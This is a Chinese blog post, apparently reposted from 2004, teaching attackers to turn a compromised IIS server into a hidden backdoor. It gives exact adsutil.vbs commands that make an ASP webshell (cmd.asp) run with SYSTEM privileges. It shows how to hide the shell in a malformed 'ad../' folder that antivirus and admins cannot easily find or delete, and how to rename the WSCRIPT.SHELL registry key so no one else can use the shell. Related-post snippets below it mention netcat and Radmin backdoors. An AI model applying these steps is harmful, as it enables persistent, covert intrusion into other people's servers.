利用adsutil.vbs+../+cmd.asp打造完美后门(alpha)

最新推荐文章于 2019-06-03 19:35:00 发布
最新推荐文章于 2019-06-03 19:35:00 发布
阅读量1.5k 收藏
点赞数
分类专栏: 木马后门 文章标签: system 杀毒软件 iis 工具 asp c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freexploit/article/details/232921
版权


本文作者:alpha
文章出处:未知
文章性质:原创
阅读次数:25
发布时间:2004-12-27
一直以来我们为做一个好的后门而郁闷着,那些现成的后门软件都很难逃脱杀毒软件的追杀,而自己写后门对我们这些小虫虫来是又似乎不太现实。下面我将教你一个方法,让你打造只属于你自己的后门!



所须工具:

一个cmd.asp足够了哟,自己写一个或者是找一个都行,不过建议自己写一个其实很简单的哟!而且自己写的还不会被杀掉。光盘里有一个我自己写的cmd.asp很详细的注释哟,你可以看看!



打造过程:

假设你已经攻下了一台机子。

好了开始开工了!

相信大家还都记得原来有一篇文章里说把iis里的应用程序保护设置成:低(iis进程) 然后运行的asp木马就有system权限了吧!

我们将把他设置成:中(共用的),然后仍然让我们的cmd.asp以system权限运行。(图1)


这就用到adsutil.vbs这个工具了。

Adsutil.vbs是系统自带的一个工具,用来管理iis的,一般在c:/inetpub/adminscripts下。

至于adsutil.vbs的具体使用在这里不再阐述,请自己在网上去查哟!

其中

在应用程序保护设置为“中”的情况下:LM/W3SVC/InProcessIsapiApps,进程内启动ISAPI。LM/W3SVC/InProcessIsapiApps是一个数组,里面包含的是一组指向一些ISAPI的路径。在这个数组里面的ISAPI运行的时候都是由inetinfo.exe直接启动的,继承inetinfo.exe的local system权限;而不在其中的ISAPI则是由svchost.exe派生的dllhost.exe进程启动的,运行的身份是IWAM_NAME,然而我们要做的就是手动添加asp.dll到这里。

注意这个里面的东西不能添加,只能覆盖!!

执行:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps

看看原来都有那些:(图2)


然后执行:cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:/WINDOWS/system32/inetsrv/httpext.dll" "C:/WINDOWS/system32/inetsrv/httpodbc.dll" "C:/WINDOWS/system32/inetsrv/ssinc.dll" "C:/WINDOWS/system32/msw3prt.dll" "C:/WINDOWS/Microsoft.NET/Framework/v1.1.4322/aspnet_isapi.dll" "C:/WINDOWS/system32/inetsrv/asp.dll"

注意各个值之间是用一个空格搁开的,不是回车!如下图(图3)




好了,这下应用程序保护设置为中也没有用了,我们还是system权限!

然后再让我们来打造一个杀毒软件杀不到,管理员找不到的文件夹把cmd.asp放进去!(图4)


让我们打开文件夹看看,你会神奇的发现aaa和aaa。(建立文件夹时的aaa../)文件夹里的都是1.txt(图5)


那2.txt去哪里了呢?实际上我们打开的aaa。文件夹实际进的是aaa文件夹。

而2.txt还是在真正的aaa../里面哟!而且这个文件夹用一般方法是删不掉的哟!

具体可参照我收录的一篇文章:让ASP木马不被杀.txt



好了利用这个原理,我们在肉鸡的建站目录里建立一个文件夹,假设他原由ad这个文件夹,我们建立一个ad../的文件夹,然后用copy命令把我们的cmd.asp给拷过去!

好了,现在我们已经有不被查杀不容易被发现的system后门了!

可是想过没有,如果别人也传了一个cmd.asp上去,那我们不是成了螳螂捕蝉黄雀在后里的螳螂了。不行,我们要打造只属于我自己的后门!



cmd.asp里有这么一句:

set oScript=server.createobject("WSCRIPT.SHELL")



这句可是核心哟,好了去注册表搜索WSCRIPT.SHELL项然后把他修改成你想要的,如WSCRIPT.SHELLshell 。(图6)

注意搜索的时候还会搜索到WSCRIPT.SHELL.1也应改改掉,不然就白忙活了哟!



然后把你的cmd.asp里面的

set oScript=server.createobject("WSCRIPT.SHELL")

改为

set oScript=server.createobject("WSCRIPT.SHELLshell")



好了,把cmd.asp拷进ad../

这样你就有自己的后门了。

访问后门的时候只需要输入http://host/ad../cmd.asp

就可以了

看一下我做的这个,(图7)


呵呵,还不错吧!



注:

以上截图是在2003下的,在2000下或许会有点不同,但是我在2000下测试过,成功了哟!

错误的地方请高手指正,不明白的地方到www.cnhack.cn与我讨论!

感谢nsfocus的tombkeeper。



-----文中有几个地方为了读者和编辑看清楚用“。”代替了”.”。
freexploit
关注
专栏目录
asp木马中的cmd执行
liswa 电脑备忘录
03-24 3452
        以前一直看不懂asp木马中的cmd命令执行。当时如果默认的系统是有可执行属性的话,肯定是不必修改,直接在命令行中写入命令即可,但是如果对方系统的cmd是没有权限的,这时需要我们上传一个cmd.exe上去,放置在可执行的目录下,再在asp木马中制定cmd.exe来执行,这时我就有点困惑了,因为它上面有可几个地方,一个说是路径,一个说是参数,一个说是命令(asp站长助手中只有路径和命令
vbs nc 后门程序
11-30
vbs横行的日子里我不在,在vbs不横行的时候 我小玩一下
用nc+简单bat/vbs脚本+winrar制作迷你远控后门
weixin_30633949的博客
06-03 536
前言   某大佬某天和我聊起了nc,并且提到了nc正反向shell这个概念。   我对nc之前的了解程度仅局限于:可以侦听TCP/UDP端口,发起对应的连接。   真正的远控还没实践过,所以决定写个小后门试一试。 1.NC、正向Shell、反向Shell介绍 1.1 什么是nc:   nc是netcat的简写,就是一个简单、可靠的网络工具。当然因为某些奇怪原因,已经被各大杀毒轮番轰炸。...
[黑客必备] Vbs脚本实现radmin终极后门 [工具打包]
nw019nw
01-19 779
[黑客必备] Vbs脚本实现radmin终极后门 [工具打包] 2012年01月16日   在网上看到N多人做radmin后门,要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用,希望大家喜欢。   on error resume next   const HKEY_LOCAL_MACHINE = &H80000002   strComputer = "...
asp执行cmd实例
海阔天空
03-18 9179
第一个,来看zzzeva免fso的cmd.asp 代码如下: 是不是觉得有点长了?在注入时写有点不好写。那来改一下。 第二个,更改zzzeva免fso的cmd.asp 代码如下: 用法是xx.asp?cmd=net user 这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个 第三个,缩短的cmd.asp 这里用了r
ASP.Net执行cmd命令的实现代码
weixin_33969116的博客
08-27 631
using System; using System.Collections; using System.Configuration; using System.Data; using System.Linq; using System.Web; using System.Web.Security; using System.Web.UI; using Syst...
使用 Adsutil.vbs iis管理脚本
09-04
Adsutil.vbs 是一个强大的工具,用于管理和配置 Internet Information Services (IIS)。这个脚本是基于 Microsoft Visual Basic Scripting Edition (VBScript) 和 Active Directory 服务接口 (ADSI),使得用户可以...
cscript adsutil.vbs 设置iis参数提示拒绝访问的解决方法
09-05
标题中的“cscript adsutil.vbs 设置iis参数提示拒绝访问的解决方法”是指在尝试使用Windows脚本宿主(cscript)执行adsutil.vbs脚本来修改IIS(Internet Information Services)配置时遇到的权限问题。adsutil.vbsIIS...
无法找到脚本文件adsutil.vbs的解决方法
09-03
**adsutil.vbs** 是一个在 **Windows 2003** 操作系统中与 **IIS6.0 (Internet Information Services)** 配套使用的脚本文件,它主要用于通过命令行方式对IIS进行管理和配置。这个脚本包含了多种实用的命令,允许...
cmd.asp [自定cmd.exe地址]
FreeXploiT
10-28 1873
本文作者:lcx文章出处:未知文章性质:原创阅读次数:28发布日期:2004-10-24  end if %> if request("cmdx")="cmd.exe地址,可更改可默认" then response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall end i
vbs添加账号
10-27
vbs添加账号
黑客实战之攻击篇——用NC打造成自己的简单后门
cexosoft的专栏
01-30 9188
大家都知道nc是一个强大并且灵活的黑客工具,用他可以做很多事情,譬如做为telnet的客户端口,譬如入侵的时候反弹回来shell,譬如扫描……但是你有没有想过将他打造成一个服务级的后门呢?现在好多跟我一样的菜鸟还不懂得编程,别人写的流行点的后门又经常被杀,那就跟我一起来自己手工制作一个后门吧,不需要任何编程知识菜鸟级的东东哦。   首先请准备好不被杀的nc.exe(随便加个壳就可以了的),还有sc
用VB编写一个可以在ASP环境下调用的运行CMD命令的组件
程序设计与安全 @EVAN-CSS
08-30 1915
有时我们在管理服务器时为了安全起见会禁用Windows Scripting Host,这样能防止某些不法用户利用WSH生成一个WebShell,对服务器造成很大的安全隐患。但如果我们又想禁用WSH,又想使用自己的WebShell用于服务器的管理怎么办呢?这里介绍了一种实现ASP中运行CMD并显示结果的组件编程。希望对大家能有所帮助。首先我们新建一个ActiveDLL工程,命名为ASPCMD,新
asp.net环境下的cmd命令执行
lake2的专栏
08-03 4015
cmd.asp木马大家一定用过吧。这是一个可以执行cmd命令的asp文件(不过要被杀毒软件追杀^_^)。其原理是用WSCRIPT.SHELL对象调用cmd.exe,然后把返回的信息放到一个临时文件,再利用FSO把临时文件信息读出来显示在浏览器里。 呵呵,在asp.net环境下也是可以写出类似程序的。不过可以不用那些对象。 VB.net里有一个shell函数,可以执行外部程序。呵呵,就是利用它!现看
ASP.NET调用cmd命令提示符拒绝访问解决方案
数据库天地
08-14 340
最近做关于Windows Server POP3服务器的小项目,翻遍网络,也没能找到接口。 值得庆幸的是最终发现了一个控制台接口winpop.exe,也就是用cmd命令提示符与POP3服务器交互。 这样实属无奈之举,用cmd命令效率低不说,而且获取、分析返回信息相当麻烦。然而这还不算什么,最主要的是:B/S模式下,网页程序有权限调用cmd吗? 这里调用cmd,当然不是调用客户机器上的...
解决IIS访问ASP.NET网站报错:您正在查找的页当前不可用
在Windows NT 4.0系统中,可以通过Adsutil.vbs脚本在<驱动器>\WINNT\System32\Inetsrv\Adminsamples路径下获取,而在Windows 2000系统中,脚本位于<驱动器>\Inetpub\Adminscripts路径下。这个脚本可以用来读取或设置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值